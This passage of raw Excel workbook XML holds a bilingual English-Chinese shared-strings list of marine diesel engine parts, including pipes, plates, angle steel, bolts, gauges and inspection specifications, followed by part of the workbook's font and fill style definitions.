  </si>
  <si>
    <t>L65×65×6×230</t>
  </si>
  <si>
    <t>L65×65×6×320</t>
  </si>
  <si>
    <t>Pipe　support</t>
  </si>
  <si>
    <t>L65×65×6×332</t>
  </si>
  <si>
    <t>Plate　265×100×t9</t>
  </si>
  <si>
    <t>Plate t9 x 50 x 120</t>
  </si>
  <si>
    <t>Angle steel L50x50x6x205</t>
  </si>
  <si>
    <t>Angle steel L50x50x6x150</t>
  </si>
  <si>
    <t>Angle steel L50x50x6x100</t>
  </si>
  <si>
    <t>Angle steel L50x50x6x239</t>
  </si>
  <si>
    <t>Angle steel L50x50x6x130</t>
  </si>
  <si>
    <t>Plate t9 x 60 x 90</t>
  </si>
  <si>
    <t>Butterfly　valve 5K-150</t>
  </si>
  <si>
    <t>Plate t9 X 90 X 60</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 275L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 112L</t>
  </si>
  <si>
    <t>L50x50x6x130</t>
  </si>
  <si>
    <t>L50x50x6x100</t>
  </si>
  <si>
    <t>Pipe 100A x 29L</t>
  </si>
  <si>
    <t>Pipe 100A x 10L</t>
  </si>
  <si>
    <t>336 X 100 X t2.3</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 224.3L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 160L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 90L</t>
  </si>
  <si>
    <t>Rigging conn. pipe of air vent and drain pipe of air cooler</t>
  </si>
  <si>
    <t>Pipe 32A x 835.8L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 249L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 234L</t>
  </si>
  <si>
    <t>Plate t9 X 65 X 120</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 156.3L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 245L.</t>
  </si>
  <si>
    <t>Plate t9 X 65 X 100</t>
  </si>
  <si>
    <t>Pipe of A/C cooling water</t>
  </si>
  <si>
    <t>Pipe　150A×188L</t>
  </si>
  <si>
    <t>Pipe 15A x 426.5L</t>
  </si>
  <si>
    <t>Pipe 100A x 1756.4L</t>
  </si>
  <si>
    <t>Pipe 65A x 457.9L</t>
  </si>
  <si>
    <t>Pipe 65A x 2288.9L</t>
  </si>
  <si>
    <t>Inlet branch pipe</t>
  </si>
  <si>
    <t>Pipe 25A x 199.5L</t>
  </si>
  <si>
    <t>Hose connection 5K-50</t>
  </si>
  <si>
    <t>Piece</t>
  </si>
  <si>
    <t>Tightening ring</t>
  </si>
  <si>
    <t>Screw fitting</t>
  </si>
  <si>
    <t>Boss G1</t>
  </si>
  <si>
    <t>Plate t9 X 180 X 75</t>
  </si>
  <si>
    <t>Plate t9 X 65 X 250</t>
  </si>
  <si>
    <t>Angle steel L65 X 65 X 6 X 327L</t>
  </si>
  <si>
    <t>Arrangement of flow switch</t>
  </si>
  <si>
    <t>Flow switch drain tank</t>
  </si>
  <si>
    <t>Pipe 100A x 188L</t>
  </si>
  <si>
    <t>Pipe 40A x 52L</t>
  </si>
  <si>
    <t>Plate t6 X φ110</t>
  </si>
  <si>
    <t>Angle steel L65 X 65 X 6 X 134L</t>
  </si>
  <si>
    <t>Plate t6 X 50 X 36.8</t>
  </si>
  <si>
    <t>Plate t6 X 105 X 36.8</t>
  </si>
  <si>
    <t>Boss G1/2</t>
  </si>
  <si>
    <t>Boss M36 X 2</t>
  </si>
  <si>
    <t>Pipe of flow switch</t>
  </si>
  <si>
    <t>Pipe 20A x 508L</t>
  </si>
  <si>
    <t>Pipeφ15 X 1.6 X 640L</t>
  </si>
  <si>
    <t>Butterfly valve 50A</t>
  </si>
  <si>
    <t>Special flange 5K - 50</t>
  </si>
  <si>
    <t>Pipe 50A x 126.5L</t>
  </si>
  <si>
    <t>Magnetic level switch (FM-12)</t>
  </si>
  <si>
    <t>Pipe 15A x 316.4L</t>
  </si>
  <si>
    <t>Plate t12 X 305 X 115</t>
  </si>
  <si>
    <t>Plate t12 X 212 X 115</t>
  </si>
  <si>
    <t>Angle steel L65 X 65 X 6 X 535.5L</t>
  </si>
  <si>
    <t>Pipe 15A×ｓｃｈ40×1154Ｌ</t>
  </si>
  <si>
    <t>L50×50×6×350</t>
  </si>
  <si>
    <t>Plate ｔ9×65×110</t>
  </si>
  <si>
    <t>Plate ｔ6×90×35.5</t>
  </si>
  <si>
    <t>Inlet branch pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Pipe 25A x 179.6L</t>
  </si>
  <si>
    <t>Pipe 25A x 87.9L</t>
  </si>
  <si>
    <t>Pipe 20A x 45.8L</t>
  </si>
  <si>
    <t>Pipe 20A x 85.8L</t>
  </si>
  <si>
    <t>Cyl. cooling water inlet bypass pipe</t>
  </si>
  <si>
    <t>Pipe 20A x 849.7L</t>
  </si>
  <si>
    <t>Pipe 150A×181.6L</t>
  </si>
  <si>
    <t>Pipe 150A×446.1L</t>
  </si>
  <si>
    <t>Pipe 150A×66.6L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 227L</t>
  </si>
  <si>
    <t>Angle steel L50 X 50 X 6 X 138.5L</t>
  </si>
  <si>
    <t>Orifice (40A φ8)</t>
  </si>
  <si>
    <t>Pipe assembly of water vent pipe</t>
  </si>
  <si>
    <t>Plate 6A x 164.2</t>
  </si>
  <si>
    <t>U-bolt 25A (for 2 No.)</t>
  </si>
  <si>
    <t>L50 X 50 X 6 X 150L</t>
  </si>
  <si>
    <t>Plate 100 X 60 X t10</t>
  </si>
  <si>
    <t>Pipe 100A x 160L</t>
  </si>
  <si>
    <t>Pipe 15A x 126.2L</t>
  </si>
  <si>
    <t>Plate φ105 X t9</t>
  </si>
  <si>
    <t>L50 X 50 X 6-130L</t>
  </si>
  <si>
    <t>L40 X 40 X 5-120L</t>
  </si>
  <si>
    <t>Hanger stand 15 X 15 X t3.2</t>
  </si>
  <si>
    <t xml:space="preserve">Stand 15 X 15 X t3.2 </t>
  </si>
  <si>
    <t>TRH hanger TRH-118</t>
  </si>
  <si>
    <t>Hanger rail  TRH-118</t>
  </si>
  <si>
    <t>Lead wire holding piece assembly</t>
  </si>
  <si>
    <t>Lead wire holding peace assembly</t>
  </si>
  <si>
    <t>Plate 43 X 10 X t1.6</t>
  </si>
  <si>
    <t>Plate 55 X 10 X t1.6</t>
  </si>
  <si>
    <t>Rubber damper assembly</t>
  </si>
  <si>
    <t>Plate 30 X 19 X t12</t>
  </si>
  <si>
    <t>Plate 47 X 25 X t3</t>
  </si>
  <si>
    <t>Rubber for gauge board</t>
  </si>
  <si>
    <t>Cable band</t>
  </si>
  <si>
    <t>Enclose oil pressure gauge DU 3/8 X 75</t>
  </si>
  <si>
    <t>U-tube support base</t>
  </si>
  <si>
    <t>H300 X 150 X 6.5 X 9 X 1284L</t>
  </si>
  <si>
    <t>Plate 385 X 150 X t16</t>
  </si>
  <si>
    <t>Plate 98 X 19 X t22</t>
  </si>
  <si>
    <t>Plate 365 X 50 X t12</t>
  </si>
  <si>
    <t>Plate 500 X 75 X t9</t>
  </si>
  <si>
    <t>Plate 32 X 25 X t6</t>
  </si>
  <si>
    <t>Plate 288 X 100 X t16</t>
  </si>
  <si>
    <t>U-tube manometer</t>
  </si>
  <si>
    <t>Dial thermometer 300℃</t>
  </si>
  <si>
    <t>Dial thermometer 100°</t>
  </si>
  <si>
    <t>Dial thermometer　100°×100L</t>
  </si>
  <si>
    <t>L50 X 50 X 6 X 554L</t>
  </si>
  <si>
    <t>Plate 120 X 100 X t12</t>
  </si>
  <si>
    <t>Differential pressure gauge pipe assembly</t>
  </si>
  <si>
    <t>Pipe φ10 X t1.6 X 5000L</t>
  </si>
  <si>
    <t>Pressure gauge pipe and dial thermometer assembly</t>
  </si>
  <si>
    <t>Copper pipe φ10 X t1.6 X 5000L</t>
  </si>
  <si>
    <t>Instrument panel conduit assembly</t>
  </si>
  <si>
    <t>Corbon steel pipe φ10 X t1.5 X 4000L</t>
  </si>
  <si>
    <t>Instrument pipe of pressure switch assembly</t>
  </si>
  <si>
    <t>Pipe φ10 X t1.6 X 5000</t>
  </si>
  <si>
    <t>Instrument board</t>
  </si>
  <si>
    <t>Pipe φ10 X ｔ1.6 X 300L</t>
  </si>
  <si>
    <t>Instrument panel mount</t>
  </si>
  <si>
    <t>Plate 310 X 255 X t6</t>
  </si>
  <si>
    <t>Plate 50 X 50 X t6</t>
  </si>
  <si>
    <t>L40 X 40 X 5 X 140L</t>
  </si>
  <si>
    <t>Plate 75 X 38 X t6</t>
  </si>
  <si>
    <t>Plate 310 X 65 X t9</t>
  </si>
  <si>
    <t>Pressure gauge support base</t>
  </si>
  <si>
    <t>Channel steel C125 X 65 X 6 X 8 X 1069L</t>
  </si>
  <si>
    <t>Channel steel C125 X 65 X 6 X 8 X 508L</t>
  </si>
  <si>
    <t>L65 X 65 X 6 X 508L</t>
  </si>
  <si>
    <t>Plate 226 X 175 X t16</t>
  </si>
  <si>
    <t>Plate 124 X 38 X t9</t>
  </si>
  <si>
    <t>Plate 145 X 50 X t12</t>
  </si>
  <si>
    <t>Plate 375 X 80 X t6</t>
  </si>
  <si>
    <t>Plate 375 X 105 X t6</t>
  </si>
  <si>
    <t>Plate 234 X 105 X t6</t>
  </si>
  <si>
    <t>Plate 130 X 80 X t25</t>
  </si>
  <si>
    <t>Plate 120 X 30 X t19</t>
  </si>
  <si>
    <t>Plate 40 X 30 X t19</t>
  </si>
  <si>
    <t>Ladder hanger</t>
  </si>
  <si>
    <t>Pipe 65A X 660L</t>
  </si>
  <si>
    <t>Steel plate 174 X 120 X t16</t>
  </si>
  <si>
    <t>Steel plate 125 X 72 X t12</t>
  </si>
  <si>
    <t>Steel plate 125 X 42 X t12</t>
  </si>
  <si>
    <t>Pressure switch mount</t>
  </si>
  <si>
    <t>Plate t9 X 140 X 470</t>
  </si>
  <si>
    <t>Channel steel C125 X 65 X 6 X 8 X 65L</t>
  </si>
  <si>
    <t>Plate t6 X 125 X 135</t>
  </si>
  <si>
    <t>Pressure switch cover</t>
  </si>
  <si>
    <t>Dial thermometer layout drawing</t>
  </si>
  <si>
    <t>Gauge board support</t>
  </si>
  <si>
    <t>Plate  t6</t>
  </si>
  <si>
    <t>L40 X 40 X 5 X 272</t>
  </si>
  <si>
    <t>L40 X 40 X 5 X 228</t>
  </si>
  <si>
    <t>Plate  t12</t>
  </si>
  <si>
    <t>L40 X 40 X 5 X 330</t>
  </si>
  <si>
    <t>Plate  t9</t>
  </si>
  <si>
    <t>Dial thermometer arangement for thrust bearing</t>
  </si>
  <si>
    <t>Thermometer fitting pice</t>
  </si>
  <si>
    <t>L90 X 90 X 6 X 285</t>
  </si>
  <si>
    <t>Pressure gauge  0.6Mpa</t>
  </si>
  <si>
    <t>Pressure gauge  1.5Mpa</t>
  </si>
  <si>
    <t>Bolt M10 X 15</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 25</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 20</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 35</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 40</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 45</t>
  </si>
  <si>
    <t>Hexagon head bolt M6 X 10</t>
  </si>
  <si>
    <t>Bolt M6 x 15</t>
  </si>
  <si>
    <t>Bolt M6×25</t>
  </si>
  <si>
    <t>Bolt M8 x 12</t>
  </si>
  <si>
    <t>Hexagon head bolt M8 X 15</t>
  </si>
  <si>
    <t>Bolt M8×20L</t>
  </si>
  <si>
    <t>Hexagon head bolt M8 X 20</t>
  </si>
  <si>
    <t>Bolt M8 x 20</t>
  </si>
  <si>
    <t>Bolt M8×35L</t>
  </si>
  <si>
    <t>Bolt M8 x 45</t>
  </si>
  <si>
    <t>Bolt M10×15L</t>
  </si>
  <si>
    <t>Bolt M10×20L</t>
  </si>
  <si>
    <t>Hexagon head bolt M10 X 30</t>
  </si>
  <si>
    <t>Hexagon head bolt M10x30</t>
  </si>
  <si>
    <t>Bolt M10×35L</t>
  </si>
  <si>
    <t>Bolt M10 x 35</t>
  </si>
  <si>
    <t>Hexagon head bolt M10 x 35</t>
  </si>
  <si>
    <t>Hexagon head bolt M10 x 40</t>
  </si>
  <si>
    <t>Bolt M12×20L</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 30</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 50</t>
  </si>
  <si>
    <t>Bolt M12×50</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 85</t>
  </si>
  <si>
    <t>Bolt M12 X 110</t>
  </si>
  <si>
    <t>Bolt　M16×25</t>
  </si>
  <si>
    <t>Bolt M16 x 25</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 35</t>
  </si>
  <si>
    <t>Bolt　M16×40</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 40</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 50</t>
  </si>
  <si>
    <t>Hexagon head bolt M16x50</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 55</t>
  </si>
  <si>
    <t>Hexagon head bolt M20 X 35</t>
  </si>
  <si>
    <t>Hexagon socket head bolt M12 X 25</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M5 X 12</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M6 X 10</t>
  </si>
  <si>
    <t>Hexagon socket head bolt M6 x 10</t>
  </si>
  <si>
    <t>Bolt M6×15L</t>
  </si>
  <si>
    <t>Socket head cap screw M8 x 20</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M24x90</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M24x100</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M4 X 0.7 X 8</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M3 X 0.5 X 6</t>
  </si>
  <si>
    <t>Pan head screw M4 X 0.7 X 8</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M4 X 0.7 X 10</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M4 X 0.7 X 25</t>
  </si>
  <si>
    <t>Pan head screw M4×0.7×50</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M5 X 0.8 X 10</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M5 X 0.8 X 45</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M6 X 12</t>
  </si>
  <si>
    <t>Nut M4 X 0.7</t>
  </si>
  <si>
    <t>Hexagon head nut M12</t>
  </si>
  <si>
    <t>Hexagon　nut M16</t>
  </si>
  <si>
    <t>Double tonqued washer M8</t>
  </si>
  <si>
    <t>Plain washer M5</t>
  </si>
  <si>
    <t>Plane washer M16</t>
  </si>
  <si>
    <t>Spring washer M6</t>
  </si>
  <si>
    <t>Spring pin φ3 x 20</t>
  </si>
  <si>
    <t>Spring pin φ5 x 24</t>
  </si>
  <si>
    <t>Spring pin φ8 x 50</t>
  </si>
  <si>
    <t>Spring pin 10x32</t>
  </si>
  <si>
    <t>U-bolt 10</t>
  </si>
  <si>
    <t>U - bolt 15A</t>
  </si>
  <si>
    <t>U bolt 15A</t>
  </si>
  <si>
    <t xml:space="preserve">U bolt 15A </t>
  </si>
  <si>
    <t>U-bolt 20</t>
  </si>
  <si>
    <t>U - bolt 40A</t>
  </si>
  <si>
    <t>U - bolt 50A</t>
  </si>
  <si>
    <t>U-Bolts 50A</t>
  </si>
  <si>
    <t>U - bolt 100A</t>
  </si>
  <si>
    <t>U-bolt150A</t>
  </si>
  <si>
    <t>缆箍</t>
  </si>
  <si>
    <t>电缆联接盒</t>
  </si>
  <si>
    <t>密封板</t>
  </si>
  <si>
    <t>空冷器透气及泄放管</t>
  </si>
  <si>
    <t>空冷器透气管</t>
  </si>
  <si>
    <t>缸套水透气管</t>
  </si>
  <si>
    <t>流量开关布置图</t>
  </si>
  <si>
    <t>油雾探测器布置图</t>
  </si>
  <si>
    <t>轴磨损监测传感器</t>
  </si>
  <si>
    <t>轴磨损监测传感器布置</t>
  </si>
  <si>
    <t>伺服电机</t>
  </si>
  <si>
    <t>双头线缆</t>
  </si>
  <si>
    <t>线槽布置</t>
  </si>
  <si>
    <t>控制空气管布置</t>
  </si>
  <si>
    <t>OMD控制器</t>
  </si>
  <si>
    <t>铜垫</t>
  </si>
  <si>
    <t>铜接头</t>
  </si>
  <si>
    <t>铜管</t>
  </si>
  <si>
    <t>钢管</t>
  </si>
  <si>
    <t>Cover 610×331×t4.5</t>
  </si>
  <si>
    <t>冷却水进口旁通管</t>
  </si>
  <si>
    <t>汽缸润滑油管</t>
  </si>
  <si>
    <t>汽缸润滑油</t>
  </si>
  <si>
    <t>表盘式温度计</t>
  </si>
  <si>
    <t>填料函泄放管</t>
  </si>
  <si>
    <t>活塞底部泄放管</t>
  </si>
  <si>
    <t>空冷器泄放管</t>
  </si>
  <si>
    <t>排气阀空气弹簧泄放管</t>
  </si>
  <si>
    <t>机旁控制箱</t>
  </si>
  <si>
    <t>型号</t>
  </si>
  <si>
    <t>上紧装置</t>
  </si>
  <si>
    <t>安装底座</t>
  </si>
  <si>
    <t>法兰连接型</t>
  </si>
  <si>
    <t>泄放柜流量开关</t>
  </si>
  <si>
    <t>仪表支架</t>
  </si>
  <si>
    <t>管接头</t>
  </si>
  <si>
    <t>空冷器进回水</t>
  </si>
  <si>
    <t>进水支管</t>
  </si>
  <si>
    <t>缸套水进水支管</t>
  </si>
  <si>
    <t>缸套水进水管</t>
  </si>
  <si>
    <t>空冷器进水管</t>
  </si>
  <si>
    <t>进口连接管</t>
  </si>
  <si>
    <t>接线箱</t>
  </si>
  <si>
    <t>梯形支架</t>
  </si>
  <si>
    <t>铅丝支架装配</t>
  </si>
  <si>
    <t>负载指示器</t>
  </si>
  <si>
    <t>负载指示器布置图</t>
  </si>
  <si>
    <t>电磁液位开关</t>
  </si>
  <si>
    <t>排气阀空气弹簧管</t>
  </si>
  <si>
    <t>蒸汽灭火管</t>
  </si>
  <si>
    <t xml:space="preserve">小型针阀 </t>
  </si>
  <si>
    <t>铭牌（英文）</t>
  </si>
  <si>
    <t>断流报警</t>
  </si>
  <si>
    <t>单向直角接头</t>
  </si>
  <si>
    <t>缸套水出口管</t>
  </si>
  <si>
    <t>出口连接管</t>
  </si>
  <si>
    <t>转速传感器</t>
  </si>
  <si>
    <t>零件</t>
  </si>
  <si>
    <t>Pipe assembly</t>
  </si>
  <si>
    <t>流量开关管路</t>
  </si>
  <si>
    <t>Piping for govenor booster</t>
  </si>
  <si>
    <t>增压器升压器管路</t>
  </si>
  <si>
    <t>平垫圈</t>
  </si>
  <si>
    <t>带电缆接头</t>
  </si>
  <si>
    <t>压力表座</t>
  </si>
  <si>
    <t>回收管</t>
  </si>
  <si>
    <t>托料板</t>
  </si>
  <si>
    <t>筋板</t>
  </si>
  <si>
    <t>空冷器接口管</t>
  </si>
  <si>
    <t>橡胶减震器</t>
  </si>
  <si>
    <t>仪表盘橡胶块</t>
  </si>
  <si>
    <t>扫气箱泄放管</t>
  </si>
  <si>
    <t>焊接方法兰</t>
  </si>
  <si>
    <t>特制法兰</t>
  </si>
  <si>
    <t>特制方法兰</t>
  </si>
  <si>
    <t>弹簧销</t>
  </si>
  <si>
    <t>弹簧垫</t>
  </si>
  <si>
    <t>方垫片</t>
  </si>
  <si>
    <t>台</t>
  </si>
  <si>
    <t>标准温度计及传感器长度</t>
  </si>
  <si>
    <t>钢板</t>
  </si>
  <si>
    <t>温度计安装座</t>
  </si>
  <si>
    <t>三通球阀</t>
  </si>
  <si>
    <t>三通阀</t>
  </si>
  <si>
    <t>上紧垫圈</t>
  </si>
  <si>
    <t>传感器盖板</t>
  </si>
  <si>
    <t>负荷传感器</t>
  </si>
  <si>
    <t>吊架</t>
  </si>
  <si>
    <t>U型压差计</t>
  </si>
  <si>
    <t>U型压差计座</t>
  </si>
  <si>
    <t>滑油含水监测传感器</t>
  </si>
  <si>
    <t>Center plate</t>
  </si>
  <si>
    <t>Assembly support</t>
  </si>
  <si>
    <t>Inspection scope map "ISM" column</t>
  </si>
  <si>
    <t>Monoblock column welding drawing / Part2</t>
  </si>
  <si>
    <t>Monoblock column welding drawing / Part7</t>
  </si>
  <si>
    <t>Pad 20 X 15</t>
  </si>
  <si>
    <t>Pipe φ12 X1.5 X 213</t>
  </si>
  <si>
    <t>Pipe φ12 X1.5 X 247</t>
  </si>
  <si>
    <t>Specifications / instructions for mono block column</t>
  </si>
  <si>
    <t>Specifications/instructions on monoblock column</t>
  </si>
  <si>
    <t>Welding inspection map to column DE section</t>
  </si>
  <si>
    <t>Work instruction for magnetic particle testing(MT) of fusion welds</t>
  </si>
  <si>
    <t>Monoblock column machining (1/4～4/4)</t>
  </si>
  <si>
    <t>Monoblock column machining drawing (1/3～3/3)</t>
  </si>
  <si>
    <t>中心板</t>
  </si>
  <si>
    <t>机架检验规范</t>
  </si>
  <si>
    <t>机架焊接图</t>
  </si>
  <si>
    <t>机架焊接规范</t>
  </si>
  <si>
    <t>Specifications/instructions for mono block column</t>
  </si>
  <si>
    <t>Testing devise</t>
  </si>
  <si>
    <t>实验装置</t>
  </si>
  <si>
    <t>机架驱动端焊接规范</t>
  </si>
  <si>
    <t>Welding inspection map to column main assembly</t>
  </si>
  <si>
    <t>Welding inspection map to column normal section</t>
  </si>
  <si>
    <t>磁粉探伤规范</t>
  </si>
  <si>
    <t>Work instruction for ultrasonic testing(UT) of fusion welds</t>
  </si>
  <si>
    <t>熔焊超声波探伤规范</t>
  </si>
  <si>
    <t>Work instruction for ultrasonic testing(UT) of rolled steel plates</t>
  </si>
  <si>
    <t>钢材超声波探伤规范</t>
  </si>
  <si>
    <t>Work instruction for ultrasonic testing(UT) of root runs LevelC</t>
  </si>
  <si>
    <t>根部焊道超声波探伤规范</t>
  </si>
  <si>
    <t>Work instruction for visual testing(VT) of fusion welds</t>
  </si>
  <si>
    <t>熔焊表面检验规范</t>
  </si>
  <si>
    <t>5783958-7.0</t>
  </si>
  <si>
    <t>5649900-0.11</t>
  </si>
  <si>
    <t>5649835-3.11</t>
  </si>
  <si>
    <t>5568146-3.0</t>
  </si>
  <si>
    <t>5457129-5.1</t>
  </si>
  <si>
    <t>5457121-0.1</t>
  </si>
  <si>
    <t>COMBUSTION MONITORING</t>
  </si>
  <si>
    <t>CYL. COOLING WATER PIPE INLET</t>
  </si>
  <si>
    <t>ELECTRICAL COMPONENTS</t>
  </si>
  <si>
    <t>FLUSHING INSTRUCTION PIPING</t>
  </si>
  <si>
    <t>MANUFACTURING AND QUALITY SPEC.</t>
  </si>
  <si>
    <t>OIL INLET</t>
  </si>
  <si>
    <t>OIL PIPE THRUST BEARING</t>
  </si>
  <si>
    <t>OIL SUPPLY DAMPER</t>
  </si>
  <si>
    <t>ORIFICE PLATE 2-PARTS</t>
  </si>
  <si>
    <t>RED. SOCKET</t>
  </si>
  <si>
    <t>STRAIGHT SCREW-IN UNION</t>
  </si>
  <si>
    <t>TEST AND FILLING UNIT</t>
  </si>
  <si>
    <t>TOOL GEAR WHEEL CRANKSHAFT ASSY.</t>
  </si>
  <si>
    <t>燃烧监测</t>
  </si>
  <si>
    <t>COMPENSATING SHAFT</t>
  </si>
  <si>
    <t>补偿轴</t>
  </si>
  <si>
    <t>缸套冷却水管</t>
  </si>
  <si>
    <t>电气部件</t>
  </si>
  <si>
    <t>FLANGE COUPLING</t>
  </si>
  <si>
    <t>法兰接头</t>
  </si>
  <si>
    <t>管路串洗规范</t>
  </si>
  <si>
    <t>HEXAGON HEAD SCREW WITH DOG POIN</t>
  </si>
  <si>
    <t>六角头紧定螺钉</t>
  </si>
  <si>
    <t>制造及质量规范</t>
  </si>
  <si>
    <t>进油管</t>
  </si>
  <si>
    <t>推力轴承滑油管</t>
  </si>
  <si>
    <t>减震器滑油管</t>
  </si>
  <si>
    <t>转换接头</t>
  </si>
  <si>
    <t>STANDARD COMPRESSION SPRING</t>
  </si>
  <si>
    <t>直螺纹接头</t>
  </si>
  <si>
    <t>测试及充注模块</t>
  </si>
  <si>
    <t>THRUST NUT</t>
  </si>
  <si>
    <t>推力螺母</t>
  </si>
  <si>
    <t>曲轴齿轮工具</t>
  </si>
  <si>
    <t>VALVE CONNECTION PIECE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</si>
</sst>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000000"/>
    <numFmt numFmtId="177" formatCode="0_ "/>
    <numFmt numFmtId="178" formatCode="[$-409]mmmm\ d\,\ yyyy;@"/>
  </numFmts>
  <fonts count="31">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C0006"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C0006"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C6500"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="18"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="18"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="ＭＳ Ｐゴシック"/>
      <family val="3"/>
      <charset val="128"/>
    </font>
    <font>
      <sz val="6"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="128"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="128"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="10">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC7CE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.499984740745262"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFEB9C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="11"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.34998626667073579"/>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s>
  <cellStyleXfs count="19">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
